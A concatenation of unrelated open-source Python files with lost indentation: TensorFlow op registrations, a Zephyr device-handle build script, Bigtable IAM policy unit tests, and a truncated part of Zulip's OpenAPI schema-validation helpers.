ops.NotDifferentiable("InitializeTableFromTextFile")
ops.NotDifferentiable("InitializeTableFromTextFileV2")
ops.NotDifferentiable("MutableDenseHashTable")
ops.NotDifferentiable("MutableDenseHashTableV2")
ops.NotDifferentiable("MutableHashTable")
ops.NotDifferentiable("MutableHashTableV2")
ops.NotDifferentiable("MutableHashTableOfTensors")
ops.NotDifferentiable("MutableHashTableOfTensorsV2")
| |
#!/usr/bin/env python3
#
# Copyright (c) 2017 Intel Corporation
# Copyright (c) 2020 Nordic Semiconductor NA
#
# SPDX-License-Identifier: Apache-2.0
"""Translate generic handles into ones optimized for the application.
Immutable device data includes information about dependencies,
e.g. that a particular sensor is controlled through a specific I2C bus
and that it signals event on a pin on a specific GPIO controller.
This information is encoded in the first-pass binary using identifiers
derived from the devicetree. This script extracts those identifiers
and replaces them with ones optimized for use with the devices
actually present.
For example the sensor might have a first-pass handle defined by its
devicetree ordinal 52, with the I2C driver having ordinal 24 and the
GPIO controller ordinal 14. The runtime ordinal is the index of the
corresponding device in the static devicetree array, which might be 6,
5, and 3, respectively.
The output is a C source file that provides alternative definitions
for the array contents referenced from the immutable device objects.
In the final link these definitions supersede the ones in the
driver-specific object file.
"""
import sys
import argparse
import os
import struct
import pickle
from distutils.version import LooseVersion
import elftools
from elftools.elf.elffile import ELFFile
from elftools.elf.sections import SymbolTableSection
import elftools.elf.enums
# This is needed to load edt.pickle files.
sys.path.append(os.path.join(os.path.dirname(__file__),
'dts', 'python-devicetree', 'src'))
from devicetree import edtlib # pylint: disable=unused-import
if LooseVersion(elftools.__version__) < LooseVersion('0.24'):
sys.exit("pyelftools is out of date, need version 0.24 or later")
scr = os.path.basename(sys.argv[0])
def debug(text):
if not args.verbose:
return
sys.stdout.write(scr + ": " + text + "\n")
def parse_args():
global args
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("-k", "--kernel", required=True,
help="Input zephyr ELF binary")
parser.add_argument("-o", "--output-source", required=True,
help="Output source file")
parser.add_argument("-v", "--verbose", action="store_true",
help="Print extra debugging information")
parser.add_argument("-z", "--zephyr-base",
help="Path to current Zephyr base. If this argument \
is not provided the environment will be checked for \
the ZEPHYR_BASE environment variable.")
parser.add_argument("-s", "--start-symbol", required=True,
help="Symbol name of the section which contains the \
devices. The symbol name must point to the first \
device in that section.")
args = parser.parse_args()
if "VERBOSE" in os.environ:
args.verbose = 1
ZEPHYR_BASE = args.zephyr_base or os.getenv("ZEPHYR_BASE")
if ZEPHYR_BASE is None:
sys.exit("-z / --zephyr-base not provided. Please provide "
"--zephyr-base or set ZEPHYR_BASE in environment")
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/dts"))
def symbol_data(elf, sym):
addr = sym.entry.st_value
len = sym.entry.st_size
for section in elf.iter_sections():
start = section['sh_addr']
end = start + section['sh_size']
if (start <= addr) and (addr + len) <= end:
offset = addr - section['sh_addr']
return bytes(section.data()[offset:offset + len])
def symbol_handle_data(elf, sym):
data = symbol_data(elf, sym)
if data:
format = "<" if elf.little_endian else ">"
format += "%uh" % (len(data) / 2)
return struct.unpack(format, data)
# These match the corresponding constants in <device.h>
DEVICE_HANDLE_SEP = -32768
DEVICE_HANDLE_ENDS = 32767
def handle_name(hdl):
if hdl == DEVICE_HANDLE_SEP:
return "DEVICE_HANDLE_SEP"
if hdl == DEVICE_HANDLE_ENDS:
return "DEVICE_HANDLE_ENDS"
if hdl == 0:
return "DEVICE_HANDLE_NULL"
return str(int(hdl))
class Device:
"""
Represents information about a device object and its references to other objects.
"""
def __init__(self, elf, ld_constants, sym, addr):
self.elf = elf
self.ld_constants = ld_constants
self.sym = sym
self.addr = addr
# Point to the handles instance associated with the device;
# assigned by correlating the device struct handles pointer
# value with the addr of a Handles instance.
self.__handles = None
@property
def obj_handles(self):
"""
Returns the value from the device struct handles field, pointing to the
array of handles for devices this device depends on.
"""
if self.__handles is None:
data = symbol_data(self.elf, self.sym)
format = "<" if self.elf.little_endian else ">"
if self.elf.elfclass == 32:
format += "I"
size = 4
else:
format += "Q"
size = 8
offset = self.ld_constants["_DEVICE_STRUCT_HANDLES_OFFSET"]
self.__handles = struct.unpack(format, data[offset:offset + size])[0]
return self.__handles
class Handles:
def __init__(self, sym, addr, handles, node):
self.sym = sym
self.addr = addr
self.handles = handles
self.node = node
self.dep_ord = None
self.dev_deps = None
self.ext_deps = None
def main():
parse_args()
assert args.kernel, "--kernel ELF required to extract data"
elf = ELFFile(open(args.kernel, "rb"))
edtser = os.path.join(os.path.split(args.kernel)[0], "edt.pickle")
with open(edtser, 'rb') as f:
edt = pickle.load(f)
devices = []
handles = []
# Leading _ are stripped from the stored constant key
want_constants = set([args.start_symbol,
"_DEVICE_STRUCT_SIZEOF",
"_DEVICE_STRUCT_HANDLES_OFFSET"])
ld_constants = dict()
for section in elf.iter_sections():
if isinstance(section, SymbolTableSection):
for sym in section.iter_symbols():
if sym.name in want_constants:
ld_constants[sym.name] = sym.entry.st_value
continue
if sym.entry.st_info.type != 'STT_OBJECT':
continue
if sym.name.startswith("__device"):
addr = sym.entry.st_value
if sym.name.startswith("__device_"):
devices.append(Device(elf, ld_constants, sym, addr))
debug("device %s" % (sym.name,))
elif sym.name.startswith("__devicehdl_"):
hdls = symbol_handle_data(elf, sym)
# The first element of the hdls array is the dependency
# ordinal of the device, which identifies the devicetree
# node.
node = edt.dep_ord2node[hdls[0]] if (hdls and hdls[0] != 0) else None
handles.append(Handles(sym, addr, hdls, node))
debug("handles %s %d %s" % (sym.name, hdls[0] if hdls else -1, node))
assert len(want_constants) == len(ld_constants), "linker map data incomplete"
devices = sorted(devices, key = lambda k: k.sym.entry.st_value)
device_start_addr = ld_constants[args.start_symbol]
device_size = 0
assert len(devices) == len(handles), 'mismatch devices and handles'
used_nodes = set()
for handle in handles:
handle.device = None
for device in devices:
if handle.addr == device.obj_handles:
handle.device = device
break
device = handle.device
assert device, 'no device for %s' % (handle.sym.name,)
device.handle = handle
if device_size == 0:
device_size = device.sym.entry.st_size
# The device handle is one plus the ordinal of this device in
# the device table.
device.dev_handle = 1 + int((device.sym.entry.st_value - device_start_addr) / device_size)
debug("%s dev ordinal %d" % (device.sym.name, device.dev_handle))
n = handle.node
if n is not None:
debug("%s dev ordinal %d\n\t%s" % (n.path, device.dev_handle, ' ; '.join(str(_) for _ in handle.handles)))
used_nodes.add(n)
n.__device = device
else:
debug("orphan %d" % (device.dev_handle,))
hv = handle.handles
hvi = 1
handle.dev_deps = []
handle.ext_deps = []
deps = handle.dev_deps
while hvi < len(hv):
h = hv[hvi]
if h == DEVICE_HANDLE_ENDS:
break
if h == DEVICE_HANDLE_SEP:
deps = handle.ext_deps
else:
deps.append(h)
n = edt
hvi += 1
# Compute the dependency graph induced from the full graph restricted to the
# the nodes that exist in the application. Note that the edges in the
# induced graph correspond to paths in the full graph.
root = edt.dep_ord2node[0]
assert root not in used_nodes
for sn in used_nodes:
# Where we're storing the final set of nodes: these are all used
sn.__depends = set()
deps = set(sn.depends_on)
debug("\nNode: %s\nOrig deps:\n\t%s" % (sn.path, "\n\t".join([dn.path for dn in deps])))
while len(deps) > 0:
dn = deps.pop()
if dn in used_nodes:
# this is used
sn.__depends.add(dn)
elif dn != root:
# forward the dependency up one level
for ddn in dn.depends_on:
deps.add(ddn)
debug("final deps:\n\t%s\n" % ("\n\t".join([ _dn.path for _dn in sn.__depends])))
with open(args.output_source, "w") as fp:
fp.write('#include <device.h>\n')
fp.write('#include <toolchain.h>\n')
for dev in devices:
hs = dev.handle
assert hs, "no hs for %s" % (dev.sym.name,)
dep_paths = []
ext_paths = []
hdls = []
sn = hs.node
if sn:
hdls.extend(dn.__device.dev_handle for dn in sn.__depends)
for dn in sn.depends_on:
if dn in sn.__depends:
dep_paths.append(dn.path)
else:
dep_paths.append('(%s)' % dn.path)
if len(hs.ext_deps) > 0:
# TODO: map these to something smaller?
ext_paths.extend(map(str, hs.ext_deps))
hdls.append(DEVICE_HANDLE_SEP)
hdls.extend(hs.ext_deps)
# When CONFIG_USERSPACE is enabled the pre-built elf is
# also used to get hashes that identify kernel objects by
# address. We can't allow the size of any object in the
# final elf to change. We also must make sure at least one
# DEVICE_HANDLE_ENDS is inserted.
padding = len(hs.handles) - len(hdls)
assert padding > 0, \
(f"device {dev.sym.name}: "
"linker pass 1 left no room to insert DEVICE_HANDLE_ENDS. "
"To work around, increase CONFIG_DEVICE_HANDLE_PADDING by " +
str(1 + (-padding)))
while padding > 0:
hdls.append(DEVICE_HANDLE_ENDS)
padding -= 1
assert len(hdls) == len(hs.handles), "%s handle overflow" % (dev.sym.name,)
lines = [
'',
'/* %d : %s:' % (dev.dev_handle, (sn and sn.path) or "sysinit"),
]
if len(dep_paths) > 0:
lines.append(' * - %s' % ('\n * - '.join(dep_paths)))
if len(ext_paths) > 0:
lines.append(' * + %s' % ('\n * + '.join(ext_paths)))
lines.extend([
' */',
'const device_handle_t __aligned(2) __attribute__((__section__(".__device_handles_pass2")))',
'%s[] = { %s };' % (hs.sym.name, ', '.join([handle_name(_h) for _h in hdls])),
'',
])
fp.write('\n'.join(lines))
if __name__ == "__main__":
main()
| |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
class TestPolicy(unittest.TestCase):
@staticmethod
def _get_target_class():
from google.cloud.bigtable.policy import Policy
return Policy
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_ctor_defaults(self):
empty = frozenset()
policy = self._make_one()
self.assertIsNone(policy.etag)
self.assertIsNone(policy.version)
self.assertEqual(policy.bigtable_admins, empty)
self.assertEqual(policy.bigtable_readers, empty)
self.assertEqual(policy.bigtable_users, empty)
self.assertEqual(policy.bigtable_viewers, empty)
self.assertEqual(len(policy), 0)
self.assertEqual(dict(policy), {})
def test_ctor_explicit(self):
VERSION = 17
ETAG = b"ETAG"
empty = frozenset()
policy = self._make_one(ETAG, VERSION)
self.assertEqual(policy.etag, ETAG)
self.assertEqual(policy.version, VERSION)
self.assertEqual(policy.bigtable_admins, empty)
self.assertEqual(policy.bigtable_readers, empty)
self.assertEqual(policy.bigtable_users, empty)
self.assertEqual(policy.bigtable_viewers, empty)
self.assertEqual(len(policy), 0)
self.assertEqual(dict(policy), {})
def test_bigtable_admins_getter(self):
from google.cloud.bigtable.policy import BIGTABLE_ADMIN_ROLE
MEMBER = "user:phred@example.com"
expected = frozenset([MEMBER])
policy = self._make_one()
policy[BIGTABLE_ADMIN_ROLE] = [MEMBER]
self.assertEqual(policy.bigtable_admins, expected)
def test_bigtable_readers_getter(self):
from google.cloud.bigtable.policy import BIGTABLE_READER_ROLE
MEMBER = "user:phred@example.com"
expected = frozenset([MEMBER])
policy = self._make_one()
policy[BIGTABLE_READER_ROLE] = [MEMBER]
self.assertEqual(policy.bigtable_readers, expected)
def test_bigtable_users_getter(self):
from google.cloud.bigtable.policy import BIGTABLE_USER_ROLE
MEMBER = "user:phred@example.com"
expected = frozenset([MEMBER])
policy = self._make_one()
policy[BIGTABLE_USER_ROLE] = [MEMBER]
self.assertEqual(policy.bigtable_users, expected)
def test_bigtable_viewers_getter(self):
from google.cloud.bigtable.policy import BIGTABLE_VIEWER_ROLE
MEMBER = "user:phred@example.com"
expected = frozenset([MEMBER])
policy = self._make_one()
policy[BIGTABLE_VIEWER_ROLE] = [MEMBER]
self.assertEqual(policy.bigtable_viewers, expected)
def test_from_pb_empty(self):
from google.iam.v1 import policy_pb2
empty = frozenset()
message = policy_pb2.Policy()
klass = self._get_target_class()
policy = klass.from_pb(message)
self.assertEqual(policy.etag, b"")
self.assertEqual(policy.version, 0)
self.assertEqual(policy.bigtable_admins, empty)
self.assertEqual(policy.bigtable_readers, empty)
self.assertEqual(policy.bigtable_users, empty)
self.assertEqual(policy.bigtable_viewers, empty)
self.assertEqual(len(policy), 0)
self.assertEqual(dict(policy), {})
def test_from_pb_non_empty(self):
from google.iam.v1 import policy_pb2
from google.cloud.bigtable.policy import BIGTABLE_ADMIN_ROLE
ETAG = b"ETAG"
VERSION = 17
members = ["serviceAccount:service_acc1@test.com", "user:user1@test.com"]
empty = frozenset()
message = policy_pb2.Policy(
etag=ETAG,
version=VERSION,
bindings=[{"role": BIGTABLE_ADMIN_ROLE, "members": members}],
)
klass = self._get_target_class()
policy = klass.from_pb(message)
self.assertEqual(policy.etag, ETAG)
self.assertEqual(policy.version, VERSION)
self.assertEqual(policy.bigtable_admins, set(members))
self.assertEqual(policy.bigtable_readers, empty)
self.assertEqual(policy.bigtable_users, empty)
self.assertEqual(policy.bigtable_viewers, empty)
self.assertEqual(len(policy), 1)
self.assertEqual(dict(policy), {BIGTABLE_ADMIN_ROLE: set(members)})
def test_to_pb_empty(self):
from google.iam.v1 import policy_pb2
policy = self._make_one()
expected = policy_pb2.Policy()
self.assertEqual(policy.to_pb(), expected)
def test_to_pb_explicit(self):
from google.iam.v1 import policy_pb2
from google.cloud.bigtable.policy import BIGTABLE_ADMIN_ROLE
VERSION = 17
ETAG = b"ETAG"
members = ["serviceAccount:service_acc1@test.com", "user:user1@test.com"]
policy = self._make_one(ETAG, VERSION)
policy[BIGTABLE_ADMIN_ROLE] = members
expected = policy_pb2.Policy(
etag=ETAG,
version=VERSION,
bindings=[
policy_pb2.Binding(role=BIGTABLE_ADMIN_ROLE, members=sorted(members))
],
)
self.assertEqual(policy.to_pb(), expected)
def test_from_api_repr_wo_etag(self):
VERSION = 17
empty = frozenset()
resource = {"version": VERSION}
klass = self._get_target_class()
policy = klass.from_api_repr(resource)
self.assertIsNone(policy.etag)
self.assertEqual(policy.version, VERSION)
self.assertEqual(policy.bigtable_admins, empty)
self.assertEqual(policy.bigtable_readers, empty)
self.assertEqual(policy.bigtable_users, empty)
self.assertEqual(policy.bigtable_viewers, empty)
self.assertEqual(len(policy), 0)
self.assertEqual(dict(policy), {})
def test_from_api_repr_w_etag(self):
import base64
ETAG = b"ETAG"
empty = frozenset()
resource = {"etag": base64.b64encode(ETAG).decode("ascii")}
klass = self._get_target_class()
policy = klass.from_api_repr(resource)
self.assertEqual(policy.etag, ETAG)
self.assertIsNone(policy.version)
self.assertEqual(policy.bigtable_admins, empty)
self.assertEqual(policy.bigtable_readers, empty)
self.assertEqual(policy.bigtable_users, empty)
self.assertEqual(policy.bigtable_viewers, empty)
self.assertEqual(len(policy), 0)
self.assertEqual(dict(policy), {})
def test_to_api_repr_wo_etag(self):
VERSION = 17
resource = {"version": VERSION}
policy = self._make_one(version=VERSION)
self.assertEqual(policy.to_api_repr(), resource)
def test_to_api_repr_w_etag(self):
import base64
ETAG = b"ETAG"
policy = self._make_one(etag=ETAG)
resource = {"etag": base64.b64encode(ETAG).decode("ascii")}
self.assertEqual(policy.to_api_repr(), resource)
| |
# Zulip's OpenAPI-based API documentation system is documented at
# https://zulip.readthedocs.io/en/latest/documentation/api.html
#
# This file contains helper functions to interact with the OpenAPI
# definitions and validate that Zulip's implementation matches what is
# described in our documentation.
import json
import os
import re
from typing import Any, Dict, List, Mapping, Optional, Set, Tuple, Union
import orjson
from jsonschema.exceptions import ValidationError as JsonSchemaValidationError
from openapi_core import create_spec
from openapi_core.testing import MockRequest, MockResponse
from openapi_core.unmarshalling.schemas.exceptions import InvalidSchemaValue
from openapi_core.validation.request.validators import RequestValidator
from openapi_core.validation.response.validators import ResponseValidator
OPENAPI_SPEC_PATH = os.path.abspath(
os.path.join(os.path.dirname(__file__), "../openapi/zulip.yaml")
)
# A list of endpoint-methods such that the endpoint
# has documentation but not with this particular method.
EXCLUDE_UNDOCUMENTED_ENDPOINTS = {
("/realm/emoji/{emoji_name}", "delete"),
("/users", "patch"),
}
# Consists of endpoints with some documentation remaining.
# These are skipped but return true as the validator cannot exclude objects
EXCLUDE_DOCUMENTED_ENDPOINTS: Set[Tuple[str, str]] = set()
# Most of our code expects allOf to be preprocessed away because that is what
# yamole did. Its algorithm for doing so is not standards compliant, but we
# replicate it here.
def naively_merge(a: Dict[str, object], b: Dict[str, object]) -> Dict[str, object]:
ret: Dict[str, object] = a.copy()
for key, b_value in b.items():
if key == "example" or key not in ret:
ret[key] = b_value
continue
a_value = ret[key]
if isinstance(b_value, list):
assert isinstance(a_value, list)
ret[key] = a_value + b_value
elif isinstance(b_value, dict):
assert isinstance(a_value, dict)
ret[key] = naively_merge(a_value, b_value)
return ret
def naively_merge_allOf(obj: object) -> object:
if isinstance(obj, dict):
return naively_merge_allOf_dict(obj)
elif isinstance(obj, list):
return list(map(naively_merge_allOf, obj))
else:
return obj
def naively_merge_allOf_dict(obj: Dict[str, object]) -> Dict[str, object]:
if "allOf" in obj:
ret = obj.copy()
subschemas = ret.pop("allOf")
ret = naively_merge_allOf_dict(ret)
assert isinstance(subschemas, list)
for subschema in subschemas:
assert isinstance(subschema, dict)
ret = naively_merge(ret, naively_merge_allOf_dict(subschema))
return ret
return {key: naively_merge_allOf(value) for key, value in obj.items()}
class OpenAPISpec:
def __init__(self, openapi_path: str) -> None:
self.openapi_path = openapi_path
self.mtime: Optional[float] = None
self._openapi: Dict[str, Any] = {}
self._endpoints_dict: Dict[str, str] = {}
self._request_validator: Optional[RequestValidator] = None
self._response_validator: Optional[ResponseValidator] = None
def check_reload(self) -> None:
# Because importing yaml takes significant time, and we only
# use python-yaml for our API docs, importing it lazily here
# is a significant optimization to `manage.py` startup.
#
# There is a bit of a race here...we may have two processes
# accessing this module level object and both trying to
# populate self.data at the same time. Hopefully this will
# only cause some extra processing at startup and not data
# corruption.
import yaml
from jsonref import JsonRef
with open(self.openapi_path) as f:
mtime = os.fstat(f.fileno()).st_mtime
# Using == rather than >= to cover the corner case of users placing an
# earlier version than the current one
if self.mtime == mtime:
return
openapi = yaml.load(f, Loader=yaml.CSafeLoader)
spec = create_spec(openapi)
self._request_validator = RequestValidator(spec)
self._response_validator = ResponseValidator(spec)
self._openapi = naively_merge_allOf_dict(JsonRef.replace_refs(openapi))
self.create_endpoints_dict()
self.mtime = mtime
def create_endpoints_dict(self) -> None:
# Algorithm description:
# We have 2 types of endpoints
# 1.with path arguments 2. without path arguments
# In validate_against_openapi_schema we directly check
# if we have a without path endpoint, since it does not
# require regex. Hence they are not part of the regex dict
# and now we are left with only:
# endpoint with path arguments.
# Now for this case, the regex has been created carefully,
# numeric arguments are matched with [0-9] only and
# emails are matched with their regex. This is why there are zero
# collisions. Hence if this regex matches
# an incorrect endpoint then there is some backend problem.
# For example if we have users/{name}/presence then it will
# conflict with users/me/presence even in the backend.
# Care should be taken though that if we have special strings
# such as email they must be substituted with proper regex.
email_regex = r"([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})"
self._endpoints_dict = {}
for endpoint in self._openapi["paths"]:
if "{" not in endpoint:
continue
path_regex = "^" + endpoint + "$"
# Numeric arguments have id at their end
# so find such arguments and replace them with numeric
# regex
path_regex = re.sub(r"{[^}]*id}", r"[0-9]*", path_regex)
# Email arguments end with email
path_regex = re.sub(r"{[^}]*email}", email_regex, path_regex)
# All other types of arguments are supposed to be
# all-encompassing string.
path_regex = re.sub(r"{[^}]*}", r"[^\/]*", path_regex)
path_regex = path_regex.replace(r"/", r"\/")
self._endpoints_dict[path_regex] = endpoint
def openapi(self) -> Dict[str, Any]:
"""Reload the OpenAPI file if it has been modified after the last time
it was read, and then return the parsed data.
"""
self.check_reload()
assert len(self._openapi) > 0
return self._openapi
def endpoints_dict(self) -> Dict[str, str]:
"""Reload the OpenAPI file if it has been modified after the last time
it was read, and then return the parsed data.
"""
self.check_reload()
assert len(self._endpoints_dict) > 0
return self._endpoints_dict
def request_validator(self) -> RequestValidator:
"""Reload the OpenAPI file if it has been modified after the last time
it was read, and then return the openapi_core validator object. Similar
to preceding functions. Used for proper access to OpenAPI objects.
"""
self.check_reload()
assert self._request_validator is not None
return self._request_validator
def response_validator(self) -> RequestValidator:
"""Reload the OpenAPI file if it has been modified after the last time
it was read, and then return the openapi_core validator object. Similar
to preceding functions. Used for proper access to OpenAPI objects.
"""
self.check_reload()
assert self._response_validator is not None
return self._response_validator
class SchemaError(Exception):
pass
openapi_spec = OpenAPISpec(OPENAPI_SPEC_PATH)
def get_schema(endpoint: str, method: str, status_code: str) -> Dict[str, Any]:
if len(status_code) == 3 and (
"oneOf"
in openapi_spec.openapi()["paths"][endpoint][method.lower()]["responses"][status_code][
"content"
]["application/json"]["schema"]
):
# Currently at places where multiple schemas are defined they only
# differ in example so either can be used.
status_code += "_0"
if len(status_code) == 3:
schema = openapi_spec.openapi()["paths"][endpoint][method.lower()]["responses"][
status_code
]["content"]["application/json"]["schema"]
return schema
else:
subschema_index = int(status_code[4])
status_code = status_code[0:3]
schema = openapi_spec.openapi()["paths"][endpoint][method.lower()]["responses"][
status_code
]["content"]["application/json"]["schema"]["oneOf"][subschema_index]
return schema
def get_openapi_fixture(endpoint: str, method: str, status_code: str = "200") -> Dict[str, Any]:
"""Fetch a fixture from the full spec object."""
return get_schema(endpoint, method, status_code)["example"]
def get_openapi_fixture_description(endpoint: str, method: str, status_code: str = "200") -> str:
"""Fetch a fixture from the full spec object."""
return get_schema(endpoint, method, status_code)["description"]
def get_curl_include_exclude(endpoint: str, method: str) -> List[Dict[str, Any]]:
"""Fetch all the kinds of parameters required for curl examples."""
if (
"x-curl-examples-parameters"
not in openapi_spec.openapi()["paths"][endpoint][method.lower()]
):
return [{"type": "exclude", "parameters": {"enum": [""]}}]
return openapi_spec.openapi()["paths"][endpoint][method.lower()]["x-curl-examples-parameters"][
"oneOf"
]
def check_requires_administrator(endpoint: str, method: str) -> bool:
"""Fetch if the endpoint requires admin config."""
return openapi_spec.openapi()["paths"][endpoint][method.lower()].get(
"x-requires-administrator", False
)
def check_additional_imports(endpoint: str, method: str) -> Optional[List[str]]:
"""Fetch the additional imports required for an endpoint."""
return openapi_spec.openapi()["paths"][endpoint][method.lower()].get(
"x-python-examples-extra-imports", None
)
def get_responses_description(endpoint: str, method: str) -> str:
"""Fetch responses description of an endpoint."""
return openapi_spec.openapi()["paths"][endpoint][method.lower()].get(
"x-response-description", ""
)
def get_parameters_description(endpoint: str, method: str) -> str:
"""Fetch parameters description of an endpoint."""
return openapi_spec.openapi()["paths"][endpoint][method.lower()].get(
"x-parameter-description", ""
)
def generate_openapi_fixture(endpoint: str, method: str) -> List[str]:
"""Generate fixture to be rendered"""
fixture = []
for status_code in sorted(
openapi_spec.openapi()["paths"][endpoint][method.lower()]["responses"]
):
if (
"oneOf"
in openapi_spec.openapi()["paths"][endpoint][method.lower()]["responses"][status_code][
"content"
]["application/json"]["schema"]
):
subschema_count = len(
openapi_spec.openapi()["paths"][endpoint][method.lower()]["responses"][status_code][
"content"
]["application/json"]["schema"]["oneOf"]
)
else:
subschema_count = 1
for subschema_index in range(subschema_count):
if subschema_count != 1:
subschema_status_code = status_code + "_" + str(subschema_index)
else:
subschema_status_code = status_code
fixture_dict = get_openapi_fixture(endpoint, method, subschema_status_code)
fixture_description = get_openapi_fixture_description(
endpoint, method, subschema_status_code
).strip()
fixture_json = json.dumps(
fixture_dict, indent=4, sort_keys=True, separators=(",", ": ")
)
fixture.extend(fixture_description.splitlines())
fixture.append("``` json")
fixture.extend(fixture_json.splitlines())
fixture.append("```")
return fixture
def get_openapi_description(endpoint: str, method: str) -> str:
"""Fetch a description from the full spec object."""
return openapi_spec.openapi()["paths"][endpoint][method.lower()]["description"]
def get_openapi_summary(endpoint: str, method: str) -> str:
"""Fetch a summary from the full spec object."""
return openapi_spec.openapi()["paths"][endpoint][method.lower()]["summary"]
def get_endpoint_from_operationid(operationid: str) -> Tuple[str, str]:
for endpoint in openapi_spec.openapi()["paths"]:
for method in openapi_spec.openapi()["paths"][endpoint]:
operationId = openapi_spec.openapi()["paths"][endpoint][method].get("operationId")
if operationId == operationid:
return (endpoint, method)
raise AssertionError("No such page exists in OpenAPI data.")
def get_openapi_paths() -> Set[str]:
return set(openapi_spec.openapi()["paths"].keys())
def get_openapi_parameters(
endpoint: str, method: str, include_url_parameters: bool = True
) -> List[Dict[str, Any]]:
operation = openapi_spec.openapi()["paths"][endpoint][method.lower()]
# We do a `.get()` for this last bit to distinguish documented
# endpoints with no parameters (empty list) from undocumented
# endpoints (KeyError exception).
parameters = operation.get("parameters", [])
# Also, we skip parameters defined in the URL.
if not include_url_parameters:
parameters = [parameter for parameter in parameters if parameter["in"] != "path"]
return parameters
def get_openapi_return_values(endpoint: str, method: str) -> Dict[str, Any]:
operation = openapi_spec.openapi()["paths"][endpoint][method.lower()]
schema = operation["responses"]["200"]["content"]["application/json"]["schema"]
# In cases where we have used oneOf, the schemas only differ in examples
# So we can choose any.
if "oneOf" in schema:
schema = schema["oneOf"][0]
return schema["properties"]
def find_openapi_endpoint(path: str) -> Optional[str]:
for path_regex, endpoint in openapi_spec.endpoints_dict().items():
matches = re.match(path_regex, path)
if matches:
return endpoint
return None
def get_event_type(event: Dict[str, Any]) -> str:
return event["type"] + ":" + event.get("op", "")
def fix_events(content: Dict[str, Any]) -> None:
"""Remove undocumented events from events array. This is a makeshift
function so that further documentation of `/events` can happen with
only zulip.yaml changes and minimal other changes. It should be removed
as soon as `/events` documentation is complete.
"""
# 'user' is deprecated so remove its occurrences from the events array
for event in content["events"]:
event.pop("user", None)
def prune_type_schema_by_type(schema: Dict[str, Any], type: str) -> bool:
return ("enum" in schema and type not in schema["enum"]) or (
"allOf" in schema
and any(prune_type_schema_by_type(subschema, type) for subschema in schema["allOf"])
)
def prune_schema_by_type(schema: Dict[str, Any], type: str) -> bool:
return (
"properties" in schema
and "type" in schema["properties"]
and prune_type_schema_by_type(schema["properties"]["type"], type)
) or (
"allOf" in schema
and any(prune_schema_by_type(subschema, type) for subschema in schema["allOf"])
)
def validate_against_openapi_schema(
content: Dict[str, Any],
path: str,
method: str,
status_code: str,
display_brief_error: bool = False,
) -> bool:
"""Compare a "content" dict with the defined schema for a specific method
in an endpoint. Return true if validated and false if skipped.
"""
# This first set of checks are primarily training wheels that we
# hope to eliminate over time as we improve our API documentation.
# No 500 responses have been documented, so skip them
if status_code.startswith("5"):
return False
if path not in openapi_spec.openapi()["paths"].keys():
endpoint = find_openapi_endpoint(path)
# If it doesn't match it hasn't been documented yet.
if endpoint is None:
return False
else:
endpoint = path
# Excluded endpoint/methods
if (endpoint, method) in EXCLUDE_UNDOCUMENTED_ENDPOINTS:
return False
# Return true for endpoints with only response documentation remaining
if (endpoint, method) in EXCLUDE_DOCUMENTED_ENDPOINTS:
return True
# Check if the response matches its code
if status_code.startswith("2") and (content.get("result", "success").lower() != "success"):
raise SchemaError("Response is not 200 but is validating against 200 schema")
# Code is not declared but appears in various 400 responses. If
# common, it can be added to 400 response schema
if status_code.startswith("4"):
# This return statement should ideally be not here. But since
# we have not defined 400 responses for various paths this has
# been added as all 400 have the same schema. When all 400
# response have been defined this should be removed.
return True
if endpoint == "/events" and method == "get":
# This a temporary function for checking only documented events
# as all events haven't been documented yet.
# TODO: Remove this after all events have been documented.
fix_events(content)
mock_request = MockRequest("http://localhost:9991/", method, "/api/v1" + path)
mock_response = MockResponse(
# TODO: Use original response content instead of re-serializing it.
orjson.dumps(content),
status_code=status_code,
)
result = openapi_spec.response_validator().validate(mock_request, mock_response)
try:
result.raise_for_errors()
except InvalidSchemaValue as isv:
message = f"{len(isv.schema_errors)} response validation error(s) at {method} /api/v1{path} ({status_code}):"
for error in isv.schema_errors:
if display_brief_error:
# display_brief_error is designed to avoid printing 1000 lines
# of output when the schema to validate is extremely large
# (E.g. the several dozen format variants for individual
# events returned by GET /events) and instead just display the
# specific variant we expect to match the response.
brief_error_validator_value = [
validator_value
for validator_value in error.validator_value
if not prune_schema_by_type(validator_value, error.instance["type"])
]
brief_error_display_schema = error.schema.copy()
if "oneOf" in brief_error_display_schema:
brief_error_display_schema["oneOf"] = [
i_schema
for i_schema in error.schema["oneOf"]
if not prune_schema_by_type(i_schema, error.instance["type"])
]
# Field list from https://python-jsonschema.readthedocs.io/en/stable/errors/
error = JsonSchemaValidationError(
message=error.message,
validator=error.validator,
path=error.path,
instance=error.instance,
schema_path=error.schema_path,
schema=brief_error_display_schema,
validator_value=brief_error_validator_value,
cause=error.cause,
)
message += f"\n\n{type(error).__name__}: {error}"
raise SchemaError(message) from None
return True
def validate_schema(schema: Dict[str, Any]) -> None:
"""Check if opaque objects are present in the OpenAPI spec; this is an
important part of our policy for ensuring every detail of Zulip's
API responses is correct.
This is done by checking for the presence of the
`additionalProperties` attribute for all objects (dictionaries).
"""
if "oneOf" in schema:
for subschema in schema["oneOf"]:
validate_schema(subschema)
elif schema["type"] == "array":
validate_schema(schema["items"])
elif schema["type"] == "object":
if "additionalProperties" not in schema:
raise SchemaError(
"additionalProperties needs to be defined for objects to make "
+ "sure they have no additional properties left to be documented."
)
for property_schema in schema.get("properties", {}).values():
validate_schema(property_schema)
if schema["additionalProperties"]:
validate_schema(schema["additionalProperties"])
def likely_deprecated_parameter(parameter_description: str) -> bool:
if "**Changes**: Deprecated" in parameter_description:
return True
return "**Deprecated**" in parameter_description
def check_deprecated_consistency(argument: Mapping[str, Any], description: str) -> None:
# Test to make sure deprecated parameters are marked so.
if likely_deprecated_parameter(description):
assert argument["deprecated"]
if "deprecated" in argument:
assert likely_deprecated_parameter(description)
# Skip those JSON endpoints whose query parameters are different from
